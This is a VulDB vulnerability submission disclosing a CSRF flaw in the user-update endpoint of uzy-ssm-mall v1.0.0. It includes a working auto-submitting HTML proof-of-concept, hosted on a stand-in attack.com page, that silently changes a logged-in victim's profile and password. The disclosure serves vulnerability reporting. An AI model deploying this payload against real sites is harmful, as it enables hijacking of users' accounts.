Submit #549268: ghostxbh uzy-ssm-mall v1.0.0 CSRFinfo

Titleghostxbh uzy-ssm-mall v1.0.0 CSRF
DescriptionVulnerability Description In uzy-ssm-mall v1.0.0, the /mall/user/update interface lacks CSRF (Cross-Site Request Forgery) protection, meaning no token verification or identity validation is implemented. Attackers can exploit this by crafting malicious requests to trick logged-in users into unintentionally modifying their personal information. Vulnerability Location The vulnerability is located at the /mall/user/update interface. Code Audit Process The vulnerability occurs in the user information modification interface, /mall/user/update. POC Constructing a CSRF PoC: Based on the captured request packet, construct a CSRF PoC and place it on the webpage attack.com/1.html. Sending the PoC to the target user: Send attack.com/1.html to the target user, enticing them to open the link. Successful exploitation: The personal information of the attacked user is successfully modified. <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://x.x.x.x:8080/mall/user/update" method="POST"> <input type="hidden" name="user_profile_picture_src" value="" /> <input type="hidden" name="user_nickname" value="aaq" /> <input type="hidden" name="user_realname" value="awq" /> <input type="hidden" name="user_password" value="123456qaz" /> <input type="hidden" name="user_password_one" value="123456qaz" /> <input type="hidden" name="user_gender" value="0" /> <input type="hidden" name="user_birthday" value="2024-01-01" /> <input type="hidden" name="user_address" value="110101" /> <input type="submit" value="Submit request" /> </form> <script>document.forms[0].submit();</script> </body> </html>
Source⚠️ https://wiki.shikangsi.com/post/share/4ccab5f6-4f54-4bac-b0fc-a436884432ff
User
 XingYue_Mstir (UID 72225)
Submission04/02/2025 11:59 AM (1 Year ago)
Moderation04/14/2025 12:36 AM (12 days later)
StatusAccepted
VulDB entry304602 [ghostxbh uzy-ssm-mall 1.0.0 cross-site request forgery]
Points20

PreviousOverviewNext

Do you need the next level of professionalism?

Upgrade your account now!